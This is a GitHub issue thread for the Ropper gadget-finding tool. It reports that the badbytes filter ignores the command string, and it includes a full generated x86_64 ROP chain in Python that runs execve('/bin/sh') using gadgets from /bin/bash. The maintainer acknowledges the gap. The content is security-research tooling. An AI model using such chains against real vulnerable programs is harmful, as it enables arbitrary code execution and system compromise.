search

sashs / Ropper

Display information about files in different file formats and find gadgets to build rop chains for different architectures (x86/x86_64, ARM/ARM64, MIPS, PowerPC, SPARC64). For disassembly ropper uses the awesome Capstone Framework.
https://scoding.de/ropper
BSD 3-Clause "New" or "Revised" License
1.87k stars 206 forks source link

Badbytes do not check strings placed on stack #113

Closed SweetVishnya closed 2 years ago

SweetVishnya commented 5 years ago 
ropper --file /bin/bash --chain "execve cmd=/bin/sh" --badbytes 2f
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] filtering badbytes... 100%
[LOAD] removing double gadgets... 100%

[INFO] ROPchain Generator for syscall execve:

[INFO] 
write command into data section
rax 0xb
rdi address to cmd
rsi address to null
rdx address to null

[INFO] Try to create chain which fills registers without delete content of previous filled registers
[*] Try permuation 1 / 24
[INFO] 

[INFO] Look for syscall gadget

[INFO] No syscall gadget found!

[INFO] Look for syscall opcode

[INFO] syscall opcode found
[INFO] generating rop chain
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000000000 # da85596376bf384c14525c50ca010e9ab96952cb811b4abe188c9ef1b75bff9a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x000000000002d100) # 0x000000000002d100: pop r12; ret; 
rop += '//bin/sh'
rop += rebase_0(0x000000000002d1a0) # 0x000000000002d1a0: pop rbp; ret; 
rop += rebase_0(0x0000000000307000)
rop += rebase_0(0x0000000000078aa9) # 0x0000000000078aa9: mov qword ptr [rbp], r12; xor eax, eax; pop rbx; pop rbp; pop r12; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002d100) # 0x000000000002d100: pop r12; ret; 
rop += p(0x0000000000000000)
rop += rebase_0(0x000000000002d1a0) # 0x000000000002d1a0: pop rbp; ret; 
rop += rebase_0(0x0000000000307008)
rop += rebase_0(0x0000000000078aa9) # 0x0000000000078aa9: mov qword ptr [rbp], r12; xor eax, eax; pop rbx; pop rbp; pop r12; ret; 
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000002cdee) # 0x000000000002cdee: pop rdi; ret; 
rop += rebase_0(0x0000000000307000)
rop += rebase_0(0x000000000002e94a) # 0x000000000002e94a: pop rsi; ret; 
rop += rebase_0(0x0000000000307008)
rop += rebase_0(0x00000000000bd2c3) # 0x00000000000bd2c3: pop rdx; and eax, 0xc0190100; and eax, 3; add eax, 1; ret; 
rop += rebase_0(0x0000000000307008)
rop += rebase_0(0x000000000002d020) # 0x000000000002d020: pop rax; ret; 
rop += p(0x000000000000003b)
rop += rebase_0(0x0000000000001af8) # 0x0000000000001af8: syscall; 
print rop
[INFO] rop chain generated!

You have bad bytes on stack here:

rop += '//bin/sh'
sashs commented 5 years ago

Yes, that is true. Since the command is defined by the user, ropper does not check the command. I haven't implemented that, because I thought the user who creates a ropchain knows what he or she does. :) However, at least a warning should be printed.